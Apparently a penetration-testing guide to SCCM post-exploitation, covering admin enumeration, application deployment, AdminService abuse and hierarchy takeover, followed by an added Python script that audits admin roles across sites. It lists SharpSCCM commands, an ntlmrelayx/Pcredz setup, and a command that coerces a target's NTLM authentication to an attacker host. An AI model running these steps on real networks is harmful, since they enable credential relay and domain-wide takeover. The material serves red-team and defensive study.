Since the main goal of SCCM is to deploy applications and services on the managed assets of the Active Directory, it is also a pretty good candidate for moving laterally on the network. With administrative rights on the primary site server, this can be done by deploying applications and scripts on the targets or by coercing clients' authentication.

Additionally, SCCM makes it possible to enumerate a lot of data about the resources. Among all the services offered by SCCM to the administrator, there is one named CMPivot. This service, located on the MP server, can enumerate all the resources of a computer or computer collection (installed software, local administrators, hardware specification, etc.), and perform administrative tasks on them. It uses an HTTP REST API, named AdminService, provided by the SMS Provider server.

Finally, as indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM sites in the hierarchy by the CAS.

This means that there is no security boundary between SCCM sites in the same hierarchy, and being able to take over one SCCM site means taking over all the others.


Admin & Special Account Enumeration

This step requires administrative privileges over the SCCM Management Point (MP) in order to query the MP's WMI database.

Admin Users

SharpSCCM.exe get class-instances SMS_ADMIN

Special Accounts

SharpSCCM.exe get class-instances SMS_SCI_Reserved

Applications and scripts deployment


Step 1: Confirm Access permissions

SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames

Step 2: Find target device

# Search for device of user "Frank.Zapper"
SharpSCCM.exe get primary-users -u Frank.Zapper

# List all active SCCM devices where the SCCM client is installed 
### CAUTION: This could be huge
SharpSCCM.exe get devices -w "Active=1 and Client=1"

Step 3: Deploy Application to target device

In this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:

  • Coercing an authentication might be stealthier (and requires less cleanup) than installing an application

  • To capture and relay NTLM credentials, the target device must support NTLM (very likely).

  • The neat part: the authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)

# Prep capturing server
## ntlmrelayx targeting -smb2support -socks -ts -ip -t

# Also keep Pcredz running, just in case
Pcredz -i enp0s8 -t
# Run the attack
SharpSCCM.exe exec -rid <TargetResourceID> -r <AttackerHost>

Note that the incoming authentication requests might take a while (a couple of minutes) to roll in...

AdminService API

It appears that, with SCCM administrative rights, it is possible to interact directly with the AdminService API, without using CMPivot, for SCCM post-exploitation purposes.

From UNIX-like systems, sccmhunter (Python) can be used for this purpose.

admin -u "$USER" -p "$PASSWORD" -ip "site_server_IP"

Then, the help command can be typed in the opened shell to view all the CMPivot commands handled by sccmhunter.

() C:\ >> help

Documented commands (use 'help -v' for verbose/'help <topic>' for details):

Database Commands
get_collection  get_device  get_lastlogon  get_puser  get_user

Interface Commands
exit  interact

PostEx Commands
add_admin  backdoor  backup  delete_admin  restore  script

Situational Awareness Commands
administrators  console_users  ipconfig   osinfo    sessions
cat             disk           list_disk  ps        shares  
cd              environment    ls         services  software

SCCM Hierarchy takeover

There is nothing to do. Just promote a user to any SCCM administrative role on a primary site server (for example, Full Administrator), and the role will be automatically propagated to the other SCCM sites in the hierarchy by the CAS.
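
Because a role granted on one primary site ends up on every site, an administrator audit has to compare the SMS_Admin instances of all sites against a single approved list. The following is an added example, not part of the original page or of SharpSCCM/sccmhunter: the site codes, accounts and baseline are constructed, and only the LogonName and RoleNames property names come from the SMS_Admin query above.

```python
from collections import defaultdict

# Constructed sample: SMS_Admin rows exported per site (site codes and accounts
# are made up; LogonName / RoleNames are the properties queried earlier).
SITE_EXPORTS = {
    "PS1": [
        {"LogonName": "CORP\\sccm-admin", "RoleNames": ["Full Administrator"]},
        {"LogonName": "CORP\\helpdesk1", "RoleNames": ["Read-only Analyst"]},
        {"LogonName": "CORP\\new.admin", "RoleNames": ["Full Administrator"]},
    ],
    "PS2": [
        {"LogonName": "corp\\SCCM-Admin", "RoleNames": ["Full Administrator"]},
        {"LogonName": "CORP\\new.admin", "RoleNames": ["Full Administrator"]},
    ],
    "CAS": [
        {"LogonName": "CORP\\sccm-admin", "RoleNames": ["Full Administrator"]},
        {"LogonName": "CORP\\helpdesk1", "RoleNames": ["Full Administrator"]},
        {"LogonName": "CORP\\new.admin", "RoleNames": ["Full Administrator"]},
    ],
}

# Hypothetical baseline: approved administrators and the roles each may hold.
BASELINE = {
    "corp\\sccm-admin": {"Full Administrator"},
    "corp\\helpdesk1": {"Read-only Analyst"},
}


def audit_admins(site_exports, baseline):
    """Return {account: {"extra_roles": set, "sites": list}} for every account
    holding a role the baseline does not grant, on any site of the hierarchy."""
    findings = defaultdict(lambda: {"extra_roles": set(), "sites": set()})
    for site, rows in site_exports.items():
        for row in rows:
            account = row["LogonName"].strip().lower()  # AD names are case-insensitive
            extra = set(row.get("RoleNames") or []) - baseline.get(account, set())
            if extra:
                findings[account]["extra_roles"] |= extra
                findings[account]["sites"].add(site)
    return {a: {"extra_roles": f["extra_roles"], "sites": sorted(f["sites"])}
            for a, f in findings.items()}


if __name__ == "__main__":
    for account, f in sorted(audit_admins(SITE_EXPORTS, BASELINE).items()):
        scope = "hierarchy-wide" if len(f["sites"]) == len(SITE_EXPORTS) else "partial"
        print(f"{account}: {sorted(f['extra_roles'])} on {f['sites']} ({scope})")
```

An unapproved account that shows up on every site at once is the signature of the propagation described here, while a role drift seen on a single site points to a local change.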

